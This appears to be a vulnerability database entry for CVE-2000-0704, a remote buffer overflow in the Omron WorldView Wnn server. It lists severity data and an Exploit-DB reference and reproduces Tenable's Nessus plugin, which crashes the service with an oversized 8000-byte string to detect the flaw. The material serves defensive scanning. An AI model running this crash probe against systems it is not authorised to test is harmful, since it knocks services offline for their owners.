Vulnerabilities > CVE-2000-0704 - Remote Buffer Overflow vulnerability in Omron WorldView Wnn Asian Language Server

047910
CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
freewnn
omron
wnn
critical
nessus
exploit available

Summary

Buffer overflow in SGI Omron WorldView Wnn allows remote attackers to execute arbitrary commands via long JS_OPEN, JS_MKDIR, or JS_FILE_INFO commands.

Vulnerable Configurations

Part Description Count
Application
Freewnn
3
Application
Omron
1
Application
Wnn
3

Exploit-Db

descriptionWorldView 6.5/Wnn4 4.2 Asian Language Server Remote Buffer Overflow Vulnerability. CVE-2000-0704. Remote exploit for unix platform
idEDB-ID:20163
last seen2016-02-02
modified2000-03-08
published2000-03-08
reporterUNYUN
sourcehttps://www.exploit-db.com/download/20163/
titleWorldView 6.5/Wnn4 4.2 Asian Language Server Remote Buffer Overflow Vulnerability

Nessus

NASL familyGain a shell remotely
NASL idWNN_OVERFLOW.NASL
descriptionIt was possible to make the remote Wnn server crash by sending an oversized string to it.
last seen2020-06-01
modified2020-06-02
plugin id11108
published2002-08-22
reporterThis script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11108
titleOmron WorldView Wnn Multiple Command Remote Overflow
code
#
# (C) Tenable Network Security, Inc.
#

# References:
# http://www.tomo.gr.jp/users/wnn/0008ml/msg00000.html
# http://online.securityfocus.com/advisories/4413

include("compat.inc");

if (description)
{
  script_id(11108);
  script_version("1.18");
  script_cvs_date("Date: 2018/08/07 16:46:50");

  script_cve_id("CVE-2000-0704");
  script_bugtraq_id(1603);

  script_name(english:"Omron WorldView Wnn Multiple Command Remote Overflow");
  script_summary(english:"Checks if the remote Wnn can be buffer overflown");

  script_set_attribute(attribute:"synopsis", value:"The remote service is vulnerable to a buffer overflow.");
  script_set_attribute(attribute:"description", value:
"It was possible to make the remote Wnn server crash by sending an
oversized string to it.");
  script_set_attribute(attribute:"see_also", value:"ftp://patches.sgi.com/support/free/security/advisories/20000803-01-A");
  script_set_attribute(attribute:"solution", value:"Upgrade to the latest version or contact your vendor for a patch.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2000/03/08");
  script_set_attribute(attribute:"plugin_publication_date", value:"2002/08/22");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"Gain a shell remotely");
  script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");

  script_require_keys("Settings/ParanoidReport");
  script_require_ports(22273);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = 22273;
if(!get_port_state(port))exit(0);
soc = open_sock_tcp(port);
if(soc)
{
  send(socket:soc, data:raw_string(0x00, 0x00, 0x00, 0x01));
  send(socket:soc, data:raw_string(0x00, 0x00, 0x40, 0x00));
  buf = crap(8000);
  buf[10] = raw_string(0);
  buf[799] = raw_string(0);
  send(socket:soc, data:buf);
  close(soc);
  sleep(1);
  soc2 = open_sock_tcp(port);
  if(!soc2)
    security_hole(port);
}